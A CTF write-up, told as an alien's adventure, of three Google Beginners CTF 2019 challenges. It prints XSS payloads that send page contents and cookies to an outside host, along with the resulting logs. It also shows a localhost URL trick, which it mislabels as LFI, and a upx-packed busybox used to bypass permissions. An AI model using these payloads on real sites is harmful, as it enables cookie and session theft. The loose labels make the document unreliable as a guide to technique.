Section 1: Cookie World Order
Embarking on the Google Beginners CTF 2019, we find ourselves entangled in a captivating web challenge - "Cookie World Order (web)." The discovery of a mysterious VPN named cWo takes center stage, painting a vivid picture of clandestine operations reminiscent of Xenon's hard-shelled turtle ruling class.
1.1 The Enigma of cWo
As we stumble upon the cWo, a veil of mystery shrouds this clandestine organization. Trusting their security to an external contractor, particularly one with questionable habits, adds an unexpected layer to the intrigue. The parallels drawn with Xenon's turtle-like ruling class set the stage for a journey into the unknown, with the elusive "Cauliflowers" emerging as the dominant lifeforms within the cWo.
1.2 The Gateway: cWo-XSS Challenge
Our journey unfolds with a pivotal link: cWo-XSS Challenge. Navigating this digital gateway, we encounter a classic XSS vulnerability waiting to be exploited. The injected script:
<SCRIPT SRC="https://mfurga.com/xss.js"></SCRIPT>
Unleashes a clever XMLHttpRequest that stealthily extracts sensitive data, specifically cookies, sending them to an external server. This breach is exemplified in server logs, revealing the power of our exploit:
104.155.55.51 - - [28/Jul/2019:16:03:51 +0200] "GET /?data=ZmxhZz1DVEZ7M21icjRjM190aGVfYzAwazFlX3cwcjFkX29yZDNyfTsgYXV0aD1UVXRiOVBQQTljWWtmY1ZRV1l6eHk0WGJ0eUwzVk5Leg== HTTP/1.0" 200 1959 "https://cwo-xss.web.ctfcompetition.com/exploit?reflect=%3CSCRIPT/XSS%20SRC=%22https://mfurga.com/xss.js%22%3E%3C/SCRIPT%3E" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/77.0.3827.0 Safari/537.36"
Decoding the base64 cookie:
flag=CTF{3mbr4c3_the_c00k1e_w0r1d_ord3r}; auth=TUtb9PPA9cYkfcVQWYzxy4XbtyL3VNKz
This newfound information becomes our key to unraveling the mysteries held within /admin/controls.
1.3 The Conundrum of /admin/controls
Our exploration leads us to /admin/controls, where the second flag awaits, guarded by the prerequisite of requests only being accepted from 127.0.0.1. Undeterred, we navigate through trials, eventually discovering a Local File Inclusion (LFI) pathway.
1.4 Triumph Through LFI Exploits
Crafting a meticulous URL:
<https://cwo-xss.web.ctfcompetition.com/watch?livestream=https://cwo-xss.web.ctfcompetition.com@127.0.0.1/admin/controls>
The LFI exploit proves successful, granting access to the coveted /admin/controls directory. Here, the second flag unfurls its secrets, solidifying our triumph over the challenges presented by the Cookie World Order.
Here are the flags,
FLAG: CTF{3mbr4c3_the_c00k1e_w0r1d_ord3r}
FLAG: CTF{WhatIsThisCookieFriendSpaceBookPlusAllAccessRedPremiumThingLooksYummy}
Section 2: Work Computer (sandbox)
With the confidence and decision-making skills that once qualified you as a contender for Xenon's Universal takeover council (now disbanded), you forge ahead to the work computer. Surprisingly, the machine graciously introduces itself, detailing its hardware and peripherals. Your inquisitive mind fixates on the price announcement of the display stand—$999. The trivialities of Earth's currency exchange to Xenonivian Bucklets become a passing thought as you immerse yourself in more pressing matters.
A peculiar image captures your attention, labeled "Cauliflower for cWo." Your forty hearts skip a beat; these Cauliflowers appear familiar, resembling your neighbors back home with their curdley lobes. The thought of them attending the party brings a smile to your multi-faceted face.
SarahH, an apparent programmer with several clients, unwittingly leaves a terminal open. Apologies to the clients, but aliens are about to poke around in search of Cauliflowers. Navigating Earth's systems proves challenging, given the lack of familiar commands like cat, less, or more.
A connection to readme.ctfcompetition.com on port 1337 opens a gateway, revealing a restricted set of commands:
> nc -v readme.ctfcompetition.com 1337
> ls -la
total 12
drwxrwxrwt 2 0 0 80 Jul 14 12:17 .
drwxr-xr-x 20 0 0 4096 Jun 13 14:28 ..
---------- 1 1338 1338 33 Jul 14 12:17 ORME.flag
-r-------- 1 1338 1338 28 Jul 14 12:17 README.flag
Attempting to read ORME.flag is met with "Permission denied," prompting creative thinking to overcome this hurdle. An exploration of available commands exposes the presence of the upx command, an executable packer. Seizing this opportunity, you compress the busybox binary and create a new executable named chmod.
> upx -9 -o /tmp/chmod /bin/busybox
> /tmp/chmod 777 ORME.flag
> shuf ORME.flag
CTF{Th3r3_1s_4lw4y5_4N07h3r_W4y}
In a twist of fate, a different method is employed to reveal the second flag:
> shuf README.flag
CTF{4ll_D474_5h4ll_B3_Fr33}
The Earthly challenges are overcome, and Xenonivian celebrations commence with the acquisition of both flags:
FLAG 1: CTF{4ll_D474_5h4ll_B3_Fr33}
FLAG 2: CTF{Th3r3_1s_4lw4y5_4N07h3r_W4y}
Section 3: Government Agriculture Network (web)
Undeterred by the alien world's bureaucratic boundaries, you delve into the Government Agriculture Network (web), uncovering a curious blend of personal and professional life. On Earth, you recall warnings about the perils of loose zips sinking commercial ships, a concept you ponder as you navigate the intertwining of work and personal affairs.
Accessing the Agricultural network with SarahH's credentials, you realize she holds the esteemed rank of Vendor/Contractor, a position you assume is reserved for the most revered individuals. Expecting a flow of information akin to Xenovian acid streams, you embark on a mission fueled by a newfound purpose – saving the small, attractive entity from an impending bipedal ingestion. The portal picture stirs emotions, creating an instant bond despite the lack of familiarity.
A sudden shift in the image, depicting the presumed consumption of the creature, triggers a surge of determination. You must save them; you must understand this "Gubberment" entity to halt the atrocity. As you beat on the metaphorical window, access to the cauliflower's host becomes paramount for a rescue mission.
3.1 Unleashing XSS for Information
The discovery of a post-submission status hints at a potential vulnerability. Armed with an XSS exploit, you inject a script into the portal:
<h1>Hello world!</h1>
<script>
var req = new XMLHttpRequest()
req.onload = function() {
var reqHook = new XMLHttpRequest();
reqHook.open("GET","https://mfurga.com?data=" + btoa(req.responseText) + "&cookies=" + btoa(document.cookie),false);
reqHook.send();
}
req.open("GET", "/admin");
req.send();
</script>
This script sends a request to an external server, capturing responses and cookies. The logs reveal success:
104.155.55.51 - - [27/Jul/2019:14:21:06 +0200] "GET /?data=Q1RGezhhYWEyZjM0YjM5MmI0MTU2MDE4MDRjMmY1ZjBmMjRlfQ==&cookies=ZmxhZz1DVEZ7OGFhYTJmMzRiMzkyYjQxNTYwMTgwNGMyZjVmMGYyNGV9OyBzZXNzaW9uPUhXU3V3WDg3ODRDbWtRQzFWdjBCWEVUanlYTXROUXJW HTTP/1.0" 200 1959 "https://govagriculture.web.ctfcompetition.com/pwn?msg=%3Ch1%3EHello+world%21%3C%2Fh1%3E%0D%0A%3Cscript%3E%0D%0A++var+req+%3D+new+XMLHttpRequest%28%29%3B%0D%0A++req.onload+%3D+function%28%29+%7B%0D%0A++++var+reqHook+%3D+new+XMLHttpRequest%28%29%3B%0D%0A++++reqHook.open%28%0D%0A++++++%22GET%22%2C%0D%0A++++++%22https%3A%2F%2Fmfurga.com%3Fdata%3D%22+%2B+btoa%28req.responseText%29+%2B+%22%26cookies%3D%22+%2B+btoa%28document.cookie%29%2C%0D%0A++++++false%29%3B%0D%0A++++reqHook.send%28%29%3B%0D%0A++%7D%0D%0A++req.open%28%22GET%22%2C+%22%2Fadmin%22%29%3B%0D%0A++req.send%28%29%3B%0D%0A%3C%2Fscript%3E" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/77.0.3827.0 Safari/537.36"
3.2 Unveiling the Gubberment Secrets
Decoding the base64 strings from the logs reveals valuable information:
> atob("Q1RGezhhYWEyZjM0YjM5MmI0MTU2MDE4MDRjMmY1ZjBmMjRlfQ==")
"CTF{8aaa2f34b392b415601804c2f5f0f24e}"
> atob("ZmxhZz1DVEZ7OGFhYTJmMzRiMzkyYjQxNTYwMTgwNGMyZjVmMGYyNGV9OyBzZXNzaW9uPUhXU3V3WDg3ODRDbWtRQzFWdjBCWEVUanlYTXROUXJW")
"flag=CTF{8aaa2f34b392b415601804c2f5f0f24e}; session=HWSuwX8784CmkQC1Vv0BXETjyXMtNQrV"
3.3 The Triumph of Rescue
The flags and session id unveil themselves, marking the triumph of your mission:
FLAG: CTF{8aaa2f34b392b415601804c2f5f0f24e}